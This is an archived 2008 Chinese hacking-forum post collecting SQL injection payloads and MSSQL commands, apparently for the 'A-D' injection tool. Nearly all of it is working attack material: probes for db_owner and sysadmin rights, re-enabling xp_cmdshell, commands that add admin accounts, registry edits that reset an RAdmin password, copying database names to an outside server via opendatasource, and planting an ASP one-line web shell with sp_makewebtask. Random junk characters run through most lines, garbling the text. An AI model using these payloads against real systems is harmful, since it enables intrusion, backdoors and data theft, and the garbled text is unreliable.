我爱电脑技术论坛's Archiver

icetears 发表于 2008-6-26 21:13

阿D常用注入命令收集整理

常用的注入代码^E T.d6@)n_
:adA6[8b@Zr
//看看是什么权限的C2l-w&PIZZ)O\
and 1=(Select IS_MEMBER('db_owner'))
1DaW-N A)Vf And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
3h#Sv~Y4zg
Su fFrm!z+p{i //检测是否有读取某数据库的权限:wG0`Pe;{Usg
and 1= (Select HAS_DBACCESS('master'))
fz[:z1M"[ pa And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --%x2Y3i\d7Tm)x V

0K\)m5h2l_ *W7`$U;L6g!tb8T
数字类型(q!^7C(F]3x+q]N
and char(124)%2Buser%2Bchar(124)=0
7ZkE Ek~ {~
%L'[dj;o6\B$g 字符类型x'@QH8c9x0N
' and char(124)%2Buser%2Bchar(124)=0 and ''='5_#\Z\H oi5b+f
;x"j#h*amr,w U(O
搜索类型YB aE*e o/HZ
' and char(124)%2Buser%2Bchar(124)=0 and '%'='f1wAI%v"t#{;Q

B9U ^+`h;k J 爆用户名
:P ZtI6~}z and user>0
A6Hcg.}V(I2HgA ' and user>0 and ''='
4A;F:eX2am'K0u
0BO]W+hg bLv`6u&K 检测是否为SA权限0U8v+{%ti k ^X/L3}
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--'zimw&\.b{:M
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
S-D L&]|D \ I @:h4H[bH
检测是不是MSSQL数据库%{KM$x0b;V%DFd
and exists (select * from sysobjects);--
m\1bq jJ yL4Sye a;D vR
检测是否支持多行 I yd%b,C-d
;declare @d int;-- [_Kw ]/s)Y|D5I,de

m![3J)z(P;S$F 恢复 xp_cmdshell
`}9VP.Tm*w ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- w/u9a+ta4s,@
Fu&{)N1j)H(j)m

:r)hKX)@A a select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
+L)v0Fa)G'[.h
{k,B:T'tTL-Cs7\i //-----------------------
Z ^MWwg%uX //      执行命令
"B,^x1a)R&b [0wz,~ //-----------------------5lYF:W,A dHY
首先开启沙盘模式:
,H:i3q Wjdo&H exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
(jk c`}Yye $GaP.D"A
然后利用jet.oledb执行系统命令
4Q0kn-k6m zE select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'),TA^ fa R
_~-G3`ys-Kj
执行命令s,`Ri)\b Oo
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--B$y8s&o hYt
7{g/{?'B.@
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'%?1|2l-?9EVXh{
!m egy@)MJ:c;Q
判断xp_cmdshell扩展存储过程是否存在:!T'q3eU I4NDNkL
[url]http://192.168.1.5/display.asp?keyno=188[/url] and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')!UVd#lFof
#]j.i#_4FA)\1Qs
写注册表
'~O}5X1K@qn1X;n-a exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
.t'];[qR-u QZ*l;{A jf1D9d!H@
REG_SZb0[zgy cP2n
?#i:U,z W4n N
读注册表
8rY,JR"q_ exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' {J-Il7mx(Roz2}
A4`spA;x(a$Or4v
读取目录内容
JM%XT S*y3y8G-B` exec master..xp_dirtree 'c:\winnt\system32\',1,1%@u T1PH W O

|0FGr;\
?8\.Sy`P(x\ } 数据库备份T.QN8|Gqy5`)B
backup database pubs to disk = 'c:\123.bak'qIY4b2wt$e
B6D ?uXV2M
//爆出长度
O-bA%P7p6i0E*[{ And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
7s(FAw$Y:z hRN&m-D\

+J^6q9rL"D0dw` 更改sa口令方法:用sql综合利用工具连接后,执行命令:-B[)Fx,A-f
exec sp_password NULL,'新密码','sa'
*I5C7kJKq3y r /El2~0mM:A:Q
添加和删除一个SA权限的用户test:
{$p?V(p} exec master.dbo.sp_addlogin test,ptloveqEj#Rk,R~
exec master.dbo.sp_addsrvrolemember test,sysadmin
j4AS'h-L&gc:r6bV
B'mF7Um1T 删除扩展存储过过程xp_cmdshell的语句: (o6F:bV4o
exec sp_dropextendedproc 'xp_cmdshell'
0v Daj}*K
9PtKs2` 添加扩展存储过过程(s6vIx(K1S J_.\ _*?
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
\0[*se#N l GRANT exec On xp_proxiedadata TO public %} g8`%]x4J'|4I%}d
2I%SD"re[H3O-s
a }To}]m
停掉或激活某个服务。
6yU1]6L2~e~W
.e$zkvS nmuG exec master..xp_servicecontrol 'stop','schedule'
9cP iL z d"mu P;D exec master..xp_servicecontrol 'start','schedule'n2[uBo;Yv*H*WTp

j,h{cT&i dbo.xp_subdirs
Bbs C1DF eG"\ n K Y9j
Z^q^ sIO
只列某个目录下的子目录。
5L:{i_tkw~:XU xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'QOD'v$r
&QPB'e \D-]
dbo.xp_makecab#n8qD!b5J&\4gw

5H8\5X7Wn ] 将目标多个档案压缩到某个目标档案之内。3?A9Bi}v/d1L
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
s"k}8o\6K+b4t,vF
"z2@"fb'T dbo.xp_makecab
q!su#E"wGq8{F.lr 'c:\test.cab','mszip',1,9RH$?)GN9]0_J!l
'C:\Inetpub\wwwroot\SQLInject\login.asp',
b|&u:E"g$n#f,dO 'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
k%o)W x#UC
S-p{*T(N H xp_terminate_process
BT0tl f /c?0w%_.s8RsAc
停掉某个执行中的程序,但赋予的参数是 Process ID。
A r(\*p _J6Y*@2N 利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process IDf/|xiWi-D
Qwp!v,F#c7_4s6K
xp_terminate_process 2484
7|(X'~1he 6x"sr#@ B{2S_-Su'J
xp_unpackcabv#sw;? z,c
3|F*a [*O MZA
解开压缩档。%x1L6P2Y_'w
d^,a @ h5grI
xp_unpackcab 'c:\test.cab','c:\temp',1(~,@2[ c/Fj
IBW^ v#]k0f1cz
wg3@{2K q#?%go:j
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
|G/|%r\Y\ 9Kn }/L5ez
create database lcx;
l(z-C0Y"v-xy? Create TABLE ku(name nvarchar(256) null);(k+ZOYV]5A
Create TABLE biao(id int NULL,name nvarchar(256) null);XY [e!Xe!P s |
9~E$r.k]5m {X#yj
//得到数据库名
[6m C,vIo.Y insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
/ioM*O#{)_
%xZu'bh6? G4]!]#gr&Uq
//在Master中创建表,看看权限怎样
C;x P/_/HBi } Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
*{C\ Y(^'A.A{ZA d:m%B3S$uIH-V bt
用 sp_makewebtask直接在web目录里写入一句话马:yP QM|&\
[url]http://127.0.0.1/dblogin123.asp?username=123'[/url];exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--;AD#f9i0id5e*?
/_o[ X^
//更新表内容
w+J e7Xb5v n Update films SET kind = 'Dramatic' Where id = 123
+Rumw| `6}c;l2W2x
A!k~Cb //删除内容
G[ y:b{p*w!@ delete from table_name where Stockid = 3

页: [1]
   

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.